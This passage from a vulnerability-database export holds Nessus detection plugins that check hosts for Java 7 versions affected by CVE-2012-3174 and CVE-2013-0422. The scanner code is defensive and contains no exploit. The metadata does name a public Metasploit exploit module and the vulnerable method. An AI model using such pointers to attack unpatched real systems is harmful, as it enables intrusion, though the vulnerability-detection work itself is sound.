(CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nOracle Java SE version 7 includes the Oracle Java Runtime Environment\nand the Oracle Java Software Development Kit.\n\nThis update fixes two vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Security\nAlert page, listed in the References section. (CVE-2012-3174,\nCVE-2013-0422)\n\nRed Hat is aware that a public exploit for CVE-2013-0422 is available\nthat executes code without user interaction when a user visits a\nmalicious web page using a browser with the Oracle Java 7 web browser\nplug-in enabled.\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 11 and resolve these\nissues. 
All running instances of Oracle Java must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-3174.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-0422.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.oracle.com/technetwork/topics/security/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2013-0156.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-javafx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-jdbc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-devel-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", 
reference:\"java-1.7.0-oracle-devel-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-javafx-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-javafx-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-jdbc-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-jdbc-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-plugin-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-plugin-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-oracle-src-1.7.0.11-1jpp.3.el5_9\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-src-1.7.0.11-1jpp.3.el5_9\")) flag++;\n\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-devel-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-devel-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-javafx-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-javafx-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-jdbc-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-jdbc-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", 
cpu:\"i686\", reference:\"java-1.7.0-oracle-plugin-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-plugin-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-oracle-src-1.7.0.11-1jpp.3.el6_3\")) flag++;\nif (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-oracle-src-1.7.0.11-1jpp.3.el6_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:33:55", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-01-14T00:00:00", "title": "Oracle Java SE 7 < Update 11 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA7_UPDATE11.NASL", "href": "https://www.tenable.com/plugins/nessus/63521", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63521);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 
2019/12/04\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"CERT\", value:\"625617\");\n script_xref(name:\"EDB-ID\", value:\"24045\");\n\n script_name(english:\"Oracle Java SE 7 < Update 11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of the JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a programming platform that is\npotentially affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-002/\");\n # http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaf95a3d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 7 Update 11 or later and, if necessary, remove any\naffected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"SMB/Java/JRE/*\");\n\ninfo = \"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n if (ver =~ '^1\\\\.7\\\\.0_(0[0-9]|10)([^0-9]|$)')\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.7.0_11\\n';\n }\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report = \n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions) \n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else \n audit(AUDIT_INST_VER_NOT_VULN, \"Java\", installed_versions);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:33:55", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. 
(CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according to the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.", "edition": 26, "published": "2013-02-22T00:00:00", "title": "Oracle Java SE 7 < Update 11 Multiple Vulnerabilities (Unix)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA7_UPDATE11_UNIX.NASL", "href": "https://www.tenable.com/plugins/nessus/64840", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64840);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/12/04\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"CERT\", value:\"625617\");\n script_xref(name:\"EDB-ID\", value:\"24045\");\n\n script_name(english:\"Oracle Java SE 7 < Update 11 Multiple Vulnerabilities (Unix)\");\n script_summary(english:\"Checks version of the JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a programming platform that is potentially\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. 
(CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.\");\n # http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaf95a3d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 7 Update 11 or later and, if necessary, remove any\naffected versions.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2013/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed_unix.nasl\");\n script_require_keys(\"Host/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"Host/Java/JRE/Unmanaged/*\");\n\ninfo = \"\";\nvuln = 0;\nvuln2 = 0;\ninstalled_versions = \"\";\ngranular = \"\";\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"Host/Java/JRE/Unmanaged/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n if (ver =~ '^1\\\\.7\\\\.0_(0[0-9]|10)([^0-9]|$)')\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.7.0_11\\n';\n }\n else if (ver =~ \"^[\\d\\.]+$\")\n {\n dirs = make_list(get_kb_list(install));\n foreach dir (dirs)\n granular += \"The Oracle Java version \"+ver+\" at \"+dir+\" is not granular enough to make a determination.\"+'\\n';\n }\n else\n {\n dirs = make_list(get_kb_list(install));\n vuln2 += max_index(dirs);\n }\n\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:0, extra:report);\n }\n else 
security_hole(0);\n if (granular) exit(0, granular);\n}\nelse\n{\n if (granular) exit(0, granular);\n installed_versions = substr(installed_versions, 3);\n if (vuln2 > 1)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:49", "description": "This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-01-17T00:00:00", "title": "Fedora 16 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16 (2013-0888)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:16", "p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk"], "id": "FEDORA_2013-0888.NASL", "href": "https://www.tenable.com/plugins/nessus/63586", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0888.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63586);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"FEDORA\", value:\"2013-0888\");\n\n script_name(english:\"Fedora 16 : 
java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16 (2013-0888)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=895035\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/096995.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df90b29d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:48", "description": "This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-01-17T00:00:00", "title": "Fedora 17 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc17 (2013-0868)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk"], "id": "FEDORA_2013-0868.NASL", "href": "https://www.tenable.com/plugins/nessus/63585", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0868.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63585);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"FEDORA\", value:\"2013-0868\");\n\n script_name(english:\"Fedora 17 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc17 (2013-0868)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=895035\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/096979.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0b57d281\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk\");\n 